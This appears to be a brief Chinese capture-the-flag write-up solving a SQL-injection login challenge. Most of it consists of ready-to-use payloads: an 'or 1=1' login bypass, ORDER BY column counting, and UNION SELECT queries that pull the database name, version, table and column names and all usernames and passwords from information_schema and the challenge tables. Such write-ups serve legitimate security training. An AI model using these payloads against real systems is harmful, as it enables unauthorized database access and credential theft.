题目要点
- information表
- group_concat()
- 联合查询
题目内容
解题
-
万能密码尝试登录
admin’ or 1=1;
-
爆破字段数
admin ' order by 1 #
输入框的时候用#,在地址栏的时候使用%23
在进行到4的时候报错,说明字段数为4
- 用union查询测试注入点(回显点位)
/check.php?username=1' union select 1,2,3%23&password=1,得到回显点位为2和3.
- 爆数据库
/check.php?username=1' union select 1,database(),version()%23&password=1
- 爆表名
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
- 爆破字段
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
- 爆破数据
/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
geekuser表
l0ve1ysq1表
F12查看源码